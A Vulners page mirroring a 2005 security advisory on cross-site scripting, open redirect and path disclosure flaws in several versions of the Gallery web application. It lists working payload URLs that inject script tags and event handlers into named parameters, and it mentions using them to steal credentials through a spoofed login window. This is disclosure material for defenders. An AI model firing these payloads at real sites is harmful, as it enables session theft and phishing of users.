Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

Gallery134.txt

🗓️ 18 Jan 2005 00:00:00Reported by Rafel IvgiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Gallery has Cross Site Scripting vulnerability allowing remote script execution on user devices.

Show more
Code
`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application: Gallery  
Vendors: http://gallery.sourceforge.net  
Versions: v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha  
Platforms: Windows  
Bug: Cross Site Scripting Vulnerability  
Exploitation: Remote With Browser  
Date: 17 Jan 2005  
Author: Rafel Ivgi, The-Insider  
E-Mail: [email protected]  
Website: http://theinsider.deep-ice.com  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1) Introduction  
2) Bugs  
3) The Code  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===============  
1) Introduction  
===============  
  
Gallery is open to Cross Site Scripting vulnerability, allowing a remote  
attacker to inject and execute scripts on the user’s machine while visiting  
a remote gallery.  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
======  
2) Bug  
======  
  
Gallery v1.3.4-pl1 contain a vulnerability inside ‘add_comment.php’ in the  
‘index’ field. The injection can be done using the classical tag closing:  
"><script>alert()</script>  
  
For Example:  
http://<valid host>/gallery/add_comment.php?set_albumName=Eros&index=1">  
<script>alert()</script>  
  
  
Gallery v1.3.4-pl1 also contains vulnerability inside ‘slideshow_low.php’  
in ALL the fields. The ‘slideshow_low.php’ contains the following form  
fields:  
set_albumName  
slide_index  
slide_full  
slide_loop  
slide_pause  
slide_dir  
  
The injection can be done using the classical tag closing:  
"><script>alert()</script>  
  
For Example:  
http://<valid host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_  
index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&sl  
ide_dir=1  
  
Yet there is Gallery v1.3.4-pl1 vulnerability inside ‘search.php’ in the  
‘username’ field. The injection can be done using hex encoded tag closing  
and an HTML event:  
%22%20onactivate%3D"alert%28%29"  
  
For Example:  
http://<valid  
host>/gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"  
  
  
  
Gallery v1.4.4-pl2 contains vulnerability inside ‘login.php’ in the  
‘username’ field.  
The injection can be done using hex encoded tag closing and an HTML event:  
%22%20onactivate%3D"alert%28%29"  
http://<valid host>/gallery/login.php?gallery_popup=true&username=/*%22*/%20  
onactivate%3Dalert%28%29%3e  
This version of Gallery also has an open redirection, which is a security  
risk because  
an attacker can send someone a link with a redirection to his evil host name  
or to cause  
the user to commit an attack or waste a target’s resources.  
  
For Example:  
http://<valid host>/gallery/do_command.php?set_fullOnly=on&return=<escape  
encoded evil  
host name>&cmd= All the vulnerabilities described above can be used to  
remotely call  
a JavaScript file The injected JavaScript code is responsible for:  
Automatic launching of malicious code (remote compromise by I.E exploits).  
Identity theft using a spoofed re-login window (only for galleries with  
login)  
  
Gallery v2.0 Alpha contains vulnerability inside ‘login.php’ in the  
‘g2_form[subject]’  
field. The injection can be done using an inline javascript protocol call:  
javascript:alert()  
  
For Example:  
http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2  
_form[formName]=AddComment&g2_itemId=<valid  
item>&g2_form[subject]=[img]javascript:alert  
()[/img]&g2_form[action][preview]=preview  
  
Gallery v2.0 Alpha contains another vulnerability inside ‘main.php’ in the  
‘g2_subView’ parameter. It is possible the replace any valid subView value  
such as: comment  
:ShowComments with the admin value: core:UserAdmin. This causes the gallery  
to wait 30 seconds  
and then print out the Full Path of the gallery on the server.  
  
For Example:  
http://<valid host>/g2/main.php?g2_return= http://<valid  
host>/main.php%3Fg2_view%3Dcore  
%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D< any valid/invalid session  
id such as:  
be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&g2_subView=core  
:UserAdmin  
  
Then the following data will be printed out to the attacker:  
Fatal error: Maximum execution time of 30 seconds exceeded in  
/mnt/1/<name>/www/<host>/g2/  
modules/core/UserAdmin.inc on line 55  
  
Second Time  
Fatal error: Maximum execution time of 30 seconds exceeded in  
/mnt/1/<name>/www/<host>/g2/  
modules/core/classes/GalleryUtilities.class on line 596  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===========  
3) The Code  
===========  
  
Gallery v1.3.4-pl1  
http://<host>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>al  
ert()</script>  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><s  
cript>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli  
de_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli  
de_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli  
de_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli  
de_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>  
http://<host>/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"  
  
Gallery v1.4.4-pl2  
http://<host>/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*  
/%20onactivate%3Dalert%28%29%3e<plaintext>  
http://<host>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww  
.google.com&cmd=  
  
Gallery v2.0 Alpha  
  
1) http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2  
_form[formName]=AddComment&g2_itemId=<valid  
item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview  
]=preview  
  
2)  
http://<host>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%  
3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb3  
43da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&am  
p;g2_view=core:UserAdmin&g2_subView=core:UserAdmin  
  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
---  
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Scripts and Codes will make me D.O.S , but they will never HACK me."  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
18 Jan 2005 00:00Current
7.4High risk
Vulners AI Score7.4
gallery application cross site scripting remote attacker script injection vulnerable versions windows platform bug details
19
.json
Report